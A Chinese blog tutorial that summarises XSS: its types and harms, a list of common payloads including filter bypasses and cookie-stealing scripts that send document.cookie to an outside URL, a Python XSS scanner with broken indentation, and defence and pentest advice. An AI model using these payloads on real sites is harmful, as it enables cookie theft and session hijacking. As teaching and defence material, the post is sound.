XSS简单总结

最新推荐文章于 2024-08-18 00:39:15 发布
最新推荐文章于 2024-08-18 00:39:15 发布
阅读量1.2k 收藏 1
点赞数 1
文章标签: web安全 python
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/125729427
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

目录

前言

一、XSS是什么?

二、XSS的分类

三、XSS的危害

四、超简单XSS的示例

五、XSS的一些常用payload

 六、使用Python进行简单XSS的检测

七、XSS的防御

八、关于XSS的渗透测试

前言

提示:这里可以添加本文要记录的大概内容:

跨站脚本攻击经常会出现在各种文章,书本,今天又接触到了,顺带做个简单总结。

提示:以下是本篇文章正文内容,下面案例可供参考

一、XSS是什么?

XSS称为跨站脚本攻击,重点在于脚本,现在主要基于JavaScript完成恶意攻击行为,JavaScript可以灵活操作HTML,使得XSS的攻击想象空间特别大。XSS将精心构造的JS代码注入到网页,使浏览器执行这段代码。

二、XSS的分类

1,反射型:一个网络请求包含了JavaScript代码,然后代码被执行后反射到任何提出请求的用户,攻击需要单独的请求和响应进行,甚至需要诱导用户的行为。

 2,保存型:攻击者提交的恶意数据被保存在后端,没有被过滤或净化,其它用户请求时被执行,危害最大。

 3,基于DOM型:特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,动态更新页面内容时,通过JavaScript脚本修改页面的DOM节点形成漏洞,通过与客户端的JS进行交互,在JS中执行然后被显示出来。

   关于DOM的解释:文件对象模型,用于操作HTML页面中的元素。

三、XSS的危害

1,盗取各种用户账号

2,窃取用户Cookie资料,冒充用户身份

3,劫持用户会话,执行任意操作

4,刷流量,执行弹窗广告

5,传播蠕虫病毒。

等等

 

四、超简单XSS的示例

1,反射型

2,DOM型

 

五、XSS的一些常用payload

弹窗:
<script>alert(‘xss’)</script>
<script>confirm(‘xss’)</script>
<script>prompt(‘xss’)</script>
不能弹窗:
<script>console.log(‘xss’)</script>
<script>document.write(‘xss’)</script>
引入外部域名:
<script src=’url’></script>
<img src onerror=appendChild(createElement(“script”)).src=”url”>
<img src onerror=jQuery.getScript(“url”>
还可联合onmouseover等

盗取cookie
<script>window.location.href=”url?name=”+escape(document.cookie)</script>
<script>document.body.appendChild(document.createElement(“img”)).src=”url?name=”+escape(document.cookie)</script>


在href中
<a href=javascript:alert(1)/>

在xml中:
<?xml version=”1.0”?><a xmlns:a=”http://example/html”><a:body onload=’alert(1)’></a>

过滤了圆括号:
<script>alert`1`</script>
<video src onerror=a=”%2”,location=”javascript:aler+”t”+a+81+a+9”>
<video src onerror=”javascript:window.onerror=alert;throw 1”>

过滤javascript等,可以通过内嵌TAB,空格尝试:
<IMG SRC=”jav ascript:alert(‘XSS’);”>
 <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> 十进制编码,十六进制编码
<IMG SRC=”j&#97;v&#x61;script:alert(‘xss’);”>

 自己产生事件:
<input type = "button" value = "xss" οnclick="alert(1)" />


HTML实体编码绕过:
   		 " ——&quot
           ' ——&apos
           & ——&amp
           < ——&lt
           > ——&gt
           % ——&#37
               * —— &#42

一些其他标签以及手法
<svg onload=”alert(1)”>
<input onfocus=alert(1) autofocus>
#<svg>是HTML5中新添加的标签

 六、使用Python进行简单XSS的检测

 def GET():
            try:
                try:
#风格和字体颜色显示灰色
                    grey = Style.DIM+Fore.WHITE      
                    site = raw_input("[?] Enter URL:\n[?] > ")
 #输入url,无HTTP则自动加上
                    if 'https://' in site:
                        pass
                    elif 'http://' in site:
                        pass
                    else:
                        site = "http://"+site
#解析url的返回对象

                    finalurl = urlparse.urlparse(site)  
 #把query的参数放在一个列表里                   
                    urldata = urlparse.parse_qsl(finalurl.query)  
 #完整的url
                    domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl)     
  #取地址去除http和www的后缀   
domain = domain0.replace("https://","").replace("http://","").replace("www.","").replace("/","") 
#打印出正常检查      
 print (Style.DIM+Fore.WHITE+"[+] Checking if "+domain+" is available..."+Style.RESET_ALL)  
#通过httplib包使用http协议请求网址,检查是否能打开,能则输出可以
connection = httplib.HTTPConnection(domain)                                                                        
                    connection.connect()
                    print("[+] "+Fore.GREEN+domain+" is available! Good!"+Style.RESET_ALL)
                    url = site
                    paraname = []  #创建参数名称的空列表
                    paravalue = []   #创建参数值的列表
 #显示字典的名称并且输入
                   wordlist = raw_input("[?] Enter location of Wordlist (Press Enter to use default wordlist.txt)\n[?] > ") 
                    if len(wordlist) == 0:
                        wordlist = 'wordlist.txt'
                        print(grey+"[+] Using Default wordlist..."+Style.RESET_ALL) 
#如果不输入,则启动默认字典wordlist.txt ,否则继续
                    else:
                        pass
                    payloads = []   #创建载荷列表
                    wordlistimport(wordlist,payloads)  #导入默认字典worldlist.txt的内容
                    lop = str(len(payloads))
                    grey = Style.DIM+Fore.WHITE
                    print(Style.DIM+Fore.WHITE+"[+] "+lop+" Payloads loaded..."+Style.RESET_ALL)   #输出字典正常加载
                    print("[+] Bruteforce start:") 
                    o = urlparse.urlparse(site)                                                                                          #解析url的返回对象赋值给o             
                    parameters = urlparse.parse_qs(o.query,keep_blank_values=True)     
取url的query参数,返回字典的形式
                    path = urlparse.urlparse(site).scheme+"://"+urlparse.urlparse(site).netloc+urlparse.urlparse(site).path  

#把url赋给path(如url为'https://www.baidu.com/s?wd=search',则scheme='https', netloc='www.baidu.com',params=’’,path=s,query=’wd=search’,fragment=’’并且以元组形式返回。
                    
for para in parameters: 
                        for i in parameters[para]:
                            paraname.append(para)               #参数名称列表添加url中取得的参数
                            paravalue.append(i)                 #参数的值列表添加url中参数的值
                    total = 0
                    c = 0
                    fpar = []
                    fresult = []
                    progress = 0    #开始尝试注入
                    for pn, pv in zip(paraname,paravalue):  
#将参数名和参数值打包成元组,返回元组的列表
                        print(grey+"[+] Testing '"+pn+"' parameter..."+Style.RESET_ALL)
#输出正常测试
                        fpar.append(str(pn))      
                        for x in payloads:  
#从字典的逐条取值赋给x
                            validate = x.translate(None, whitespace)  
                            if validate == "":   
#去除x中的所有空格
                                progress = progress + 1
                            else:
                                sys.stdout.write("\r[+] %i / %s payloads injected..."% (progress,len(payloads)))
                                sys.stdout.flush()  #一秒输出一个
                                progress = progress + 1
                                enc = urllib.quote_plus(x)# 
将url数据进行编码,使之能打印和web服务器接受
                                # data:https://www.baidu.com?user=123+enc
                                data = path+"?"+pn+"="+pv+enc      
 #在url的参数名称的值改成字典中的值
                                page = urllib.urlopen(data) #打开网址
                                sourcecode = page.read()#查看网址的源代码
                                if x in sourcecode:   #若网址的源代码存在注入的语句,则存在漏洞
                                    print(Style.BRIGHT+Fore.RED+"\n[!]"+" XSS Vulnerability Found! \n"+Fore.RED+Style.BRIGHT+"[!]"+" Parameter:\t%s\n"+Fore.RED+Style.BRIGHT+"[!]"+" Payload:\t%s"+Style.RESET_ALL)%(pn,x)
                                    fresult.append("  Vulnerable  ")
                                    c = 1
                                    total = total+1
                                    progress = progress + 1
                                    break
                                else:
                                    c = 0
                        if c == 0:                      #运行完没有发现漏洞则输出不存在漏洞                      print(Style.BRIGHT+Fore.GREEN+"\n[+]"+Style.RESET_ALL+Style.DIM+Fore.WHITE+" '%s' parameter not vulnerable."+Style.RESET_ALL)%pn
                            fresult.append("Not Vulnerable")
                            progress = progress + 1
                            pass
                        progress = 0
                    complete(fpar,fresult,total,domain)
                except(httplib.HTTPResponse, socket.error) as Exit: #如果网址没法访问,则再请求
                    print(Style.BRIGHT+Fore.RED+"[!] Site "+domain+" is offline!"+Style.RESET_ALL)
                    again()
            except(KeyboardInterrupt) as Exit: #字典不存在则输出不存在
                print("\nExit...")
Def post():原理一致

主要原理是通过取出POST或Get方法中的参数和参数的值,将参数的值逐个替换成字典中的每条语句,通过HTTP协议逐个访问后再取出网址的源代码,若源代码中不存在刚才注入的语句,则判断不存在XSS。

七、XSS的防御

1,防止反射型和保存型的XSS漏洞:

  1. 确认输入,应用程序对用户能自主控制提交的数据在处理前要进行严格的确认和过滤,可以使用正则表达式等规则与数据匹配,确定数据是否包含某些敏感的字符,从而拒绝或者净化存在危险的输入。
  2. 确认输出,对于提交的数据会提交到HTTP响应中的输入,应对数据进行适当的HTML编码等,使用ASCII字符代码,净化可能的恶意字符。如:

           " ——"

           ' ——&apos

           & ——&

           < ——<

           > ——>

           % ——%

            * —— *

  1. 消除危险的插入点,在应用程序涉及核心部分交互的位置要尽量的不允许用户可控制输入,避免直接在现有的JavaScript中插入用户控制输入的数据,避免请求包中指定了响应的编码类型。如果标签熟悉接收URL作为值,避免嵌入用户输入。
  2. 限定HTML的使用,避免提供引入脚本的属性和方法,可使用白名单过滤的方法,仅允许那些无法造成危害的特定的标签和属性。

2,防止DOM型的XSS漏洞:

  1. 确认输入,应用程序对它处理的数据执行严格的确认,服务器端对URL数据进行严格的确认以检测基于DOM型的恶意请求。如:

      <script>

        var a=document.URL

         a=a.substring(a.indexOf("message=")+8,a.length);

         a=unescape(a);

         var regex=/^([A-Za-z0-9+\s])*$/;

         if (regex.test(a))

            document.write(a)

</script>

  1. 确认输出,将用户可控制的DOM数据插入到文档之前,应用程序对它们进行编码,安全的方式显示在页面中。如:

function sanitize(str)

{

var d=document.createElement('div');

d.appendChild(document.createTextNode(str));

return d.innerHTML

}

八、关于XSS的渗透测试

  1,先正常使用应用程序确定内容和功能,确定向应用程序能够输入的位置提交跨站脚本攻击漏洞的测试字符串,寻找提交的输入是否在浏览器中被输出,是否对提交的内容进行了过滤或者净化,对每个位置进行单独的分析和多次的不同测试输入。

2,应用程序对输入数据的处理可能会经历不同的几个阶段的操作和交互,尽可能向应用程序提交数据时,分析数据经历的几个阶段的操作。例如,某些购物的应用程序在用户提交订单,转账等往往会被按预定的顺序提交几个不一样的请求,避免遗漏漏洞,要确保测试彻底完成。

3,对反射型XSS漏洞的探查,要注意请求的每一个页面,包括HTTP请求包中的参数和消息头里的内容。对保存型XSS漏洞探查,要分析应用程序是否存在带外通道接收和处理用户可控的输入,如应用程序存在从其它地方接收数据,任何此类带外通道都可能成为保存型XSS攻击的攻击向量。除此之外,探查应用程序处理解析了数据后得到的结果,确定应用程序可能受到的攻击面。

4,从不同的角度分析应用程序,确定用户可控制的数据是否能够构造使用其它方法保存在应用程序的后端并且输出显示给用户。例如,应用程序的搜索功能存在搜索项的的列表,可以多次重复搜索同样的列表,引入保存型XSS漏洞的有效载荷即主搜索功能安全的处理了输入。

 总结

XSS利用的想象空间很大,可以利用鲜为人知的HTML,JavaScript,VBScript的特性来实施攻击,发挥想象,总有新型的跨站脚本攻击诞生。

 

M03-Aiwin
关注
简单易懂的XSS(跨站脚本攻击)
weixin_47204991的博客
10-29 1904
跨站脚本(简称为XSS或跨站脚本或跨站脚本攻击)是针对Web应用程序的安全漏洞攻击,允许用户插入恶意的脚本,从而当用户浏览网页时,插入的脚本就会执行。从而达到攻击的目的。 1.反射型XSS 反射型XSS又叫非持久性XSS,反射型XSS注入的恶意代码不会保存在服务器端,需要欺骗用户去点击恶意链接才能攻击成功。一般通过XSS来窃取用户的cookie。 反射型XSS攻击流程: 2.存储型XSS 存储型XSS又叫持久型XSS,攻击脚本会永久存储在目标服务器中。例如在个人信息或者留言板之类的地方插入恶意脚本,用户访
XSS总结
weixin_51356351的博客
11-19 1576
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
xss总结
最新发布
weixin_72202802的博客
08-18 1094
浏览器解码顺序:html(&#)---url(%)---unicode(js)(\u)html解析机制:标签开始状态---标签名状态---数据状态在解析过程中,任何时候它只要遇到一个'<'符号(后面没有跟'/'符号)就会进入“标签开始状态(Tag open state)”。然后转变到“标签名状态(Tag name state)”,最后进入“数据状态(Data state)”并释放当前标签的token。
XSS简单攻击
qq_51627527的博客
12-15 621
xss的分类1 第一种:反射型xss 反射型XSS是最简单XSS,即输入XSS脚本或输入XSS脚本点击按钮即可完成XSS攻击,同时也称作非持久型XSS。漏洞主要存在于URL地址栏,搜索框等。 第二种:存储型XSS 也叫持久型XSS,主要将XSS代码提交存储在服务器端,下次请求目标页面时不用在提交XSS代码。当目标用户访问该页面获取数据时,XSS代码会从服务器解析之后加载出来,返回到浏览器做正常的HTML和JS解析执行,XSS攻击就发生了。该类型的漏洞主要存在于发帖,回帖评论等模块,以及用户注册等模块。 第
简单XSS
Feng_Blue_的博客
10-08 294
通过hackbar传参<script><script>alert(/xss/);</script>;</script>,发现页面只显示了alert(/xss/);,可能存在标签过滤,验证 发现并无过滤,猜测可能是只过滤了<script>标签,尝试大写 在修改其中的一个字母后,提交,成功触发。 看一下源代码 可以发现,在get接收到参数以后,进行了替换,将<script></script>替换成为...
XSS 简单理解
weixin_34388207的博客
07-07 117
什么是XSSXSS(Cross Site Scripting),即跨站脚本攻击,是一种常见于web application中的计算机安全漏洞。XSS通过在用户端注入恶意的可运行脚本,若服务器端对用户输入不进行处理,直接将用户输入输出到浏览器,则浏览器将会执行用户注入的脚本。 XSS的分类根据XSS造成的影响,可以将XSS分为非持久型和持久型。1.             非持久型,也叫反射型XS...
XSS跨站总结
02-09
### XSS跨站总结 #### 一、XSS跨站攻击概述 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的Web应用程序安全漏洞,它允许攻击者通过注入恶意脚本来攻击用户。这种攻击通常发生在用户浏览器上,利用的是...
【干货】XSS知识总结
hackzkaq的博客
10-27 6699
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
XSS攻击及防御总结和各平台通关思路
qq_43710889的博客
08-05 3513
XSS原理 跨站脚本攻击XSS(cross site scripting)。XSS是由于Web应用程序对用户的输入过滤不足而产生的,攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采用cookie窃取、会话劫持、钓鱼欺骗等各种攻击。 漏洞存在的主要原因: 参数输入未经过安全过滤 恶意脚本被输出到网页 用户的浏览器执行了恶意脚本 XSS漏洞分类 1.反射型XSS 也称非持久型、参数型跨站脚本。主要用于恶意脚本附加在URL地址的参数中。他需要欺骗
Spring-MVC处理XSS、SQL注入攻击的方法总结
11-14
### Spring MVC 处理 XSS 和 SQL 注入攻击的方法总结 #### 一、引言 在 Web 开发领域,特别是基于 Java 的应用开发中,Spring MVC 框架因其灵活高效的特点而被广泛采用。然而,随着互联网技术的发展,网络安全问题...
32个触发事件XSS语句的总结
04-01
32个触发事件XSS语句的总结,新人学习xss必看!
XSS的攻击及防御代码的简单演示
04-25
这个是XSS的攻击及防御代码的简单演示,利用Node搭建的
Xss总结
code_lab
06-13 765
1. 什么都没过滤的入门情况< script>alert(1)< /script>(练习时去掉空格) < img src=”XXXX”> < img src=1 onerror=alert(1);> 2. 输出在< script>< /script>之间的情况1.< /script>< script>XXX 2.针对输出在不同的场景,进行合适的过滤。 3. 输出在HTML属性里的情况有时候,输
xss 总结
0ffs3t
10-18 6742
document.getElementById("y").innerHTML="xxxxxxxxxx"; document.write("xxxxxxxxxxxx"); $("#y").html("xxxxxxx"); aa.innerHTML="xxxxxxxxxxxx";  这种情况下。xxxxx只能使用 这种方式来触发JS。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值